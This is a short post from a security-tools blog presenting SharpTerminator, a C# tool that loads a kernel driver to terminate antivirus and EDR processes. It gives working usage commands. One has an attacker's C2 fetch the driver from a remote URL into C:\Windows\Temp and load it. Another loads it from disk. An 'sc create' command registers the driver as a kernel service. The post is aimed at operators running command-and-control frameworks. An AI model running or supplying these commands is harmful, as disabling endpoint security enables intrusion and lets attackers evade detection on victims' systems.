Hacking Tools

SharpTerminator – A Guide To Automating AV/EDR Disruption With C# Port

C# port of ZeroMemoryEx’s Terminator, so all hail goes to him.

Usage

You can download the driver from a remote URL using SharpTerminator and load it to terminate AV/EDR processes, or you can directly load it to the disk to perform the same operation.

When using Remote URL, the driver is downloaded to “C:\Windows\Temp” and then loaded from there.

In fact, there is no difference between them; if you don’t want to use the upload function in your C2, you can use the other one.

Loading from remote url:

execute-assembly SharpTerminator.exe --url "http://remoteurl.com:80/Terminator.sys"

Loading from disk:

execute-assembly SharpTerminator.exe --disk "C:\path\to\driver\Terminator.sys"

Known Issue

If you get “Failed to register the process in the trusted list!” error you should add service manually:

sc create Terminator binPath= "C:\path\to\driver.sys" type= kernel start= demand
Varshini

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

Recent Posts

Linux 6.13-rc1 Released : What’s New!

Linux kernel 6.13-rc1 has been released by Linus Torvalds, marking the end of the two-week…

1 day ago

A Nice Day Phishing : Exploring Portable Python For Covert Execution

Scripting Interpreters are agreat method to achieve Command or Shellcode Execution, but one of many…

1 day ago

ScriptSentry : Uncovering And Mitigating Risks In Logon Scripts

ScriptSentry finds misconfigured and dangerous logon scripts. ScriptSentry is a powerful tool designed to detect…

1 day ago

SilentLoad : Stealth Driver Loading For Secure Engagements

SilentLoad is a powerful exploitation tool designed to load drivers stealthily by directly setting up…

1 day ago

Elementary OS 8 With New Secure Session Privacy Consent

Elementary OS 8 has been released with a significant focus on privacy, security, and user…

5 days ago

Raspberry Pi Launches Compute Module 5 With Wi-Fi And Bluetooth

Today we’re happy to announce the much-anticipated launch of Raspberry Pi Compute Module 5, the…

5 days ago